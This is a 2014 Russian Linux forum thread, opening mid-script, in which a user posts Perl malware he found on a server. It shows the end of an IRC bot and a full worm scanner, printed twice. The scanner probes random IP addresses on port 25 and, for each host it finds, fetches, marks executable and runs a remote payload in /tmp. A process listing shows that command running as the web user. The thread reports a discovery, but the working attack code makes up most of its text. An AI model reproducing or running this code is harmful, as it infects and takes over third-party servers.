  sendraw("NICK $_[0]");
}
sub quit {
  sendraw("QUIT :$_[0]");
  exit;
}
sub modo {
   return unless $#_ == 0;
   sendraw("MODE $_[0] $_[1]");
}
sub mode { modo(@_); }
 
sub invite {
   return unless $#_ == 1;
   sendraw("INVITE $_[1] $_[0]");
}
 
sub topico {
   return unless $#_ == 1;
   sendraw("TOPIC $_[0] $_[1]");
}
sub topic { topico(@_); }
 
sub away {
  sendraw("AWAY $_[0]");
}
sub back { away(); }
 
}

 

vilfred(*)(2014-11-08 18:57:37)
Отредактировано vilfred по причине "не указана"
avatar
Скрыть

Re:я кажись вирус на перле нашел на одной машинке-сервере

http://m.uploadedit.com/b042/1415260702980.txt

text


#!/usr/bin/perl -w

use Sys::Hostname;
use Socket;
use IO::Socket;
srand(time() ^ ($$ + ($$ << 15)));

my($addr)=inet_ntoa((gethostbyname(hostname))[4]);
# print "$addr\n";
# $ARGV[0] = $addr;
    $ARGV[0] =  join ('.', (int(rand(255))
                     ,int(rand(255))
                     ,int(rand(255))
                     ,int(1)))
          , "";
print "$ARGV[0]";
$ARGV[1] = "255.255.255.255";
$ARGV[2] = "25";
$ARGV[3] = "25";

# Check for port errors
if(($ARGV[2] > $ARGV[3]) || ($ARGV[2] > 65666) || ($ARGV[3] > 65666)){
  print "Port error.\n";
  exit 1;
}
 
# Check for IP address errors
@sip = split(/\./, $ARGV[0]);
@eip = split(/\./, $ARGV[1]);
for($x = 0; $x < 4; ++$x){
  if(($sip[$x] > 255) || ($eip[$x] > 255)){
    print "IP address error.\n";
    exit 1;
  }
}
$p = 0;
print "Scanning...\n\n";
while(1){
  $cip = join('.', @sip);
  $cmd = "python pyt $cip 'wget http://yourschool.net/.tmp/frogclog.php?SMTP=$cip;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad'";
  IO::Socket::INET->new(PeerAddr=>($cip),PeerPort=>$p,proto=>'tcp',Timeout=>1) and print "$cip:$p\n" and system($cmd);
  if($p == $ARGV[3]){
      $sip[3] += "1";
      $p = $ARGV[2];
  } else {
      ++$p;
  }
  if($sip[3] > "255"){
    $sip[2] += "1";
    $sip[3] = "0";
  }
  if($sip[2] > "255"){
    $sip[1] += "1";
    $sip[2] = "0";
  }
  if($sip[1] > "255"){
    $sip[0] += "1";
    $sip[1] = "0";
  }
  if($ARGV[1] =~ /$cip/){
    print "\nScan completed.\n";
    exit 1;
  }
}
exit;

 

vilfred(*)(2014-11-08 18:58:31)
Отредактировано vilfred по причине "не указана"
avatar
Скрыть

Re:я кажись вирус на перле нашел на одной машинке-сервере

как тут преформаттед текст сделать? как логи постить? двигло не позволяет. я сохранил все эти вещи, может кто встретится

я кажется знаю что за дыра, иногда из под вввюзера моно исполнять скрипты

vilfred(*)(2014-11-08 19:09:54)

avatar
Скрыть

Ну какой же это вирус на Перле, Вилли?

www_user 5673 0.0 0.0 5768 384 ? S Nov07 0:00 python pyt 223.202.59.75 wget http://yourschool.net/.tmp/frogclog.php?SMTP=223.202.59.75;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad

anonymous(*)(2014-11-09 00:09:43)

Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
avatar
Скрыть

Re:я кажись вирус на перле нашел на одной машинке-сервере

> как тут преформаттед текст сделать?

Втыкаешь в меню пункт "Разметка", и, используя опции форматирования, постишь свой выхлоп в том виде, как тебе хочеццо:

http://m.uploadedit.com/b042/1415260702980.txt

perl

#!/usr/bin/perl -w

use Sys::Hostname;
use Socket;
use IO::Socket;
srand( time() ^ ( $$ + ( $$ << 15 ) ) );

my ($addr) = inet_ntoa( ( gethostbyname(hostname) )[4] );

# print "$addr\n";
# $ARGV[0] = $addr;
$ARGV[0] =
  join( '.', ( int( rand(255) ), int( rand(255) ), int( rand(255) ), int(1) ) ),
  "";
print "$ARGV[0]";
$ARGV[1] = "255.255.255.255";
$ARGV[2] = "25";
$ARGV[3] = "25";

# Check for port errors
if ( ( $ARGV[2] > $ARGV[3] ) || ( $ARGV[2] > 65666 ) || ( $ARGV[3] > 65666 ) ) {
    print "Port error.\n";
    exit 1;
}

# Check for IP address errors
@sip = split( /\./, $ARGV[0] );
@eip = split( /\./, $ARGV[1] );
for ( $x = 0 ; $x < 4 ; ++$x ) {
    if ( ( $sip[$x] > 255 ) || ( $eip[$x] > 255 ) ) {
        print "IP address error.\n";
        exit 1;
    }
}
$p = 0;
print "Scanning...\n\n";
while (1) {
    $cip = join( '.', @sip );
    #
    # Дададад, это вирус на перлу:
    #
    $cmd =
"python pyt $cip 'wget http://yourschool.net/.tmp/frogclog.php?SMTP=$cip;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad'";
    IO::Socket::INET->new(
        PeerAddr => ($cip),
        PeerPort => $p,
        proto    => 'tcp',
        Timeout  => 1
      )
      and print "$cip:$p\n"
      and system($cmd);
    if ( $p == $ARGV[3] ) { $sip[3] += "1"; $p = $ARGV[2]; }
    else                  { ++$p; }
    if ( $sip[3] > "255" ) { $sip[2] += "1"; $sip[3] = "0"; }
    if ( $sip[2] > "255" ) { $sip[1] += "1"; $sip[2] = "0"; }
    if ( $sip[1] > "255" ) { $sip[0] += "1"; $sip[1] = "0"; }
    if ( $ARGV[1] =~ /$cip/ ) { print "\nScan completed.\n"; exit 1; }
}
exit;
 

anonymous(*)(2014-11-09 13:59:26)

Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
avatar
Скрыть

Re:я кажись вирус на перле нашел на одной машинке-сервере

И эти люди у нас в модераторах числятся?

anonymous(*)(2014-11-09 14:53:44)

Mozilla/5.0 (Linux; U; Android 4.1.1; ru-ru; Transformer Prime TF201 Build/JRO03C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
avatar
Скрыть

Re:я кажись вирус на перле нашел на одной машинке-сервере

Возможно поэтому у нас тут превалирует какая-то каминг-аутная тематика обсуждений. Ведь какие модераторы - такой и форум..

anonymous(*)(2014-11-09 15:07:07)

Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Этот тред читают 1 пользователь:
Анонимных: 1
Зарегистрированных: 0




(c) 2010-2020 LOR-NG Developers Group
Powered by TimeMachine

Valid HTML 4.01 Transitional Правильный CSS!